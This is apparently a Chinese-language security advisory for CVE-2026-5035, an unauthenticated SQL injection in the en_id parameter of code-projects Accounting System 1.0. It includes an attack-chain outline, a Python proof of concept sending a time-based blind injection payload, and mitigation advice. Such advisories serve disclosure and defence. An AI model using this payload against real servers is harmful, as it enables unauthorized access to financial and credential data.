CVE-2026-5035 CVSS 7.3 高危

CVE-2026-5035: code-projects会计系统SQL注入漏洞

披露日期: 2026-03-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5035

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Accounting System

漏洞概述

code-projects Accounting System 1.0版本被发现存在SQL注入漏洞。该漏洞位于/view_work.php文件的参数处理组件中，由于对en_id参数缺乏有效的过滤机制，攻击者可以通过构造恶意SQL语句进行注入。此漏洞无需用户认证即可远程利用，可能导致数据库敏感信息泄露、数据完整性受损或服务不可用，风险较高。

技术细节

该漏洞的核心成因是code-projects Accounting System在处理/view_work.php请求时，直接将用户输入的en_id参数拼接到SQL查询语句中，未使用预编译语句或进行充分的输入验证。攻击者可以利用CVSS向量中的AV:N（网络攻击）和PR:N（无需权限）特性，向服务器发送包含SQL元字符（如单引号、注释符）的HTTP GET/POST请求。通过注入UNION SELECT语句或布尔盲注Payload，攻击者可以绕过应用逻辑，读取数据库中的用户凭证、财务数据等敏感信息，甚至在特定条件下执行写入操作，严重威胁系统安全。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标服务器运行的是code-projects Accounting System 1.0，并定位到/view_work.php接口。

STEP 2

2. 漏洞探测

攻击者向en_id参数发送单引号或特定SQL语法（如AND 1=1），观察应用响应是否异常或报错。

STEP 3

3. 构造攻击载荷

根据探测结果，构造UNION SELECT查询或盲注Payload，旨在提取数据库表名、字段名或敏感数据。

STEP 4

4. 执行注入

发送包含恶意SQL代码的HTTP请求，服务器后端未过滤直接执行，导致数据泄露或篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://target-ip/view_work.php"

# Malicious payload demonstrating SQL Injection via 'en_id' parameter
# Example: Testing for time-based blind injection
payload = {
    "en_id": "1' AND (SELECT SLEEP(5))-- -"
}

try:
    print("[*] Sending SQL Injection payload...")
    response = requests.get(target_url, params=payload, timeout=10)
    
    # Check if the response time indicates successful execution (e.g., > 5 seconds)
    if response.elapsed.total_seconds() >= 5:
        print("[+] Vulnerability Confirmed: SQL Injection is successful.")
    else:
        print("[-] Vulnerability not detected or patched.")
        
except requests.exceptions.RequestException as e:
    print(f"[!] Error connecting to target: {e}")

影响范围

code-projects Accounting System 1.0

防御指南

临时缓解措施

在未发布官方补丁前，建议在网络边界部署Web应用防火墙（WAF）以拦截针对en_id参数的恶意注入请求。同时，可以通过修改代码强制对en_id参数进行整数类型转换（如intval()），作为临时的代码级缓解方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5035
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5035
3 Details https://www.cvedetails.com/cve/CVE-2026-5035/
4 VulDB https://vuldb.com/cve/CVE-2026-5035
5 Link https://code-projects.org/
6 Link https://github.com/Xu-Zhihan/CVE/issues/8
7 Link https://vuldb.com/submit/778603
8 Link https://vuldb.com/vuln/353961
9 Link https://vuldb.com/vuln/353961/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表